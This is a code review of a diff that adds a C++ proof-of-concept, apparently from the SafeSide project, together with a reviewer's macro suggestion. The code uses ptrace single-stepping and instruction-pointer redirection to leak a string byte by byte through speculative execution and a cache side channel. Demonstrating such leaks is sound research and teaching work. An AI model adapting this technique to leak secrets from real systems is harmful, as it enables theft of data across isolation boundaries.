demos/speculation_over_single_step_trap.cc

```diff
@@ -0,0 +1,213 @@
+
+    std::cout << "Dead code. Must not be printed." << std::endl;
+
+    // The exit call must not be unconditional, otherwise clang would optimize
+    // out everything that follows it and the linking would fail.
+    if (strlen(public_data) != 0) {
+      exit(EXIT_FAILURE);
+    }
+
+    // Tracer moves the instruction pointer to this label.
+    asm volatile("afterspeculation:");
+
+    std::pair<bool, char> result =
+        sidechannel.RecomputeScores(public_data[safe_offset]);
+
+    if (result.first) {
+      return result.second;
+    }
+
+    if (run > 100000) {
+      std::cerr << "Does not converge " << result.second << std::endl;
+      exit(EXIT_FAILURE);
+    }
+  }
+}
+
+void ChildProcess() {
+  // Allow the parent to trace child's execution.
+  int res = ptrace(PTRACE_TRACEME, 0, nullptr, nullptr);
+  if (res == -1) {
+    std::cerr << "PTRACE_TRACEME failed." << std::endl;
+    exit(EXIT_FAILURE);
+  }
+
+  std::cout << "Leaking the string: ";
+  std::cout.flush();
+  const size_t private_offset = private_data - public_data;
+  for (size_t i = 0; i < strlen(private_data); ++i) {
+    std::cout << LeakByte(public_data, private_offset + i);
+    std::cout.flush();
+  }
+  std::cout << "\nDone!\n";
+}
+
+void ParentProcess(pid_t child) {
+  while (true) {
+    int wstatus, res;
+    wait(&wstatus);
+    if (!WIFSTOPPED(wstatus)) {
+      break;  // Unexpected wait event.
+    }
+
+    if (WSTOPSIG(wstatus) == SIGSTOP) {
+      // Toggle on the trap flag in EFLAGS.
+      // The child stopped itself with "raise(SIGSTOP)". We have to start
+      // single-stepping the child.
+      user_regs_struct regs;
+      // Read general purpose register values of the child.
+      res = ptrace(PTRACE_GETREGS, child, nullptr, &regs);
+      if (res == -1) {
+        std::cerr << "PTRACE_GETREGS failed." << std::endl;
+        exit(EXIT_FAILURE);
+      }
+
+      // Toggle on the trap flag in child's EFLAGS.
+      regs.eflags |= 0x100;
+
+      // Store the modified child's EFLAGS register content.
+      res = ptrace(PTRACE_SETREGS, child, nullptr, &regs);
+      if (res == -1) {
+        std::cerr << "PTRACE_SETREGS failed." << std::endl;
+        exit(EXIT_FAILURE);
+      }
+
+    } else if (WSTOPSIG(wstatus) == SIGTRAP) {
+      // The child is single-stepping. Check where is the child's instruction
+      // pointer. If it points to the boundary label, move it to the
+      // afterspeculation label.
+      user_regs_struct regs;
+      // Read general purpose register values of the child.
+      res = ptrace(PTRACE_GETREGS, child, nullptr, &regs);
+      if (res == -1) {
+        std::cerr << "PTRACE_GETREGS failed." << std::endl;
+        exit(EXIT_FAILURE);
+      }
+
+      // If the child's instruction pointer points to "boundary", move it to
+      // "afterspeculation" and switch off the trap flag.
+#if SAFESIDE_X64
+      if (regs.rip == reinterpret_cast<size_t>(boundary)) {
```

Comment:
Could be nicer to make the platform-specific part smaller:

```c++
#if SAFESIDE_X64
#  define IP_REG(regs) ((regs).rip)
#else
#  define IP_REG(regs) ((regs).eip)
#endif
}
```

Reply:
Done.